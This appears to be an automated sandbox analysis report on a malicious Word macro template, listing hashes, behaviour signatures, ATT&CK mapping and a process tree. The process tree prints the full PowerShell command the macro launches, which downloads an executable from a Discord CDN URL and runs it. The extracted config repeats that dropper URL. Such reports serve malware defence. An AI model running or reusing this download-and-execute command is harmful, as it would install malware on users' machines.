Analysis

  • max time kernel
    107s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-01-2023 07:57

General

  • Target

    b5033ef20a56db2c7751506e413b6ff82b861de6f83c156f9249105eaa1db596.dotm

  • Size

    15KB

  • MD5

    f241091ae1293c0a2ae516a374af2062

  • SHA1

    6390737f980d3e96146c7d323e135ddfd41ab260

  • SHA256

    b5033ef20a56db2c7751506e413b6ff82b861de6f83c156f9249105eaa1db596

  • SHA512

    464c8eb31a8afe0767d065d4438b85876747e238c019b2b2ffbdd9e75b57e03ecf0d7fbf72916d34dc9e5aa7a38cd1936f2ad89934a420f911612bfb45adfd00

  • SSDEEP

    384:tmtegnDrrVsC78JecdkaP6akwLWdxd8KYB3HF:qlnDrrJ8J/ytakw6Lm1F

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://cdn.discordapp.com/attachments/997157313536344088/1067399880701657098/9hmhx13dh.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b5033ef20a56db2c7751506e413b6ff82b861de6f83c156f9249105eaa1db596.dotm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Start-BitsTransfer -Sou https://cdn.discordapp.com/attachments/997157313536344088/1067399880701657098/9hmhx13dh.exe -Dest C:\Users\Public\9hmhx13dh.exe;C:\Users\Public\9hmhx13dh.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1120
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1740

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/964-73-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/964-55-0x000000006FD41000-0x000000006FD43000-memory.dmp
      Filesize

      8KB

    • memory/964-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/964-57-0x0000000070D2D000-0x0000000070D38000-memory.dmp
      Filesize

      44KB

    • memory/964-58-0x0000000074BB1000-0x0000000074BB3000-memory.dmp
      Filesize

      8KB

    • memory/964-63-0x0000000070D2D000-0x0000000070D38000-memory.dmp
      Filesize

      44KB

    • memory/964-54-0x00000000722C1000-0x00000000722C4000-memory.dmp
      Filesize

      12KB

    • memory/964-74-0x0000000070D2D000-0x0000000070D38000-memory.dmp
      Filesize

      44KB

    • memory/1120-66-0x0000000000000000-mapping.dmp
    • memory/1120-71-0x0000000004C70000-0x00000000052C1000-memory.dmp
      Filesize

      6.3MB

    • memory/1120-72-0x000000006A560000-0x000000006AB0B000-memory.dmp
      Filesize

      5.7MB

    • memory/1120-69-0x000000006A560000-0x000000006AB0B000-memory.dmp
      Filesize

      5.7MB

    • memory/1740-70-0x000007FEFB7D1000-0x000007FEFB7D3000-memory.dmp
      Filesize

      8KB

    • memory/1740-68-0x0000000000000000-mapping.dmp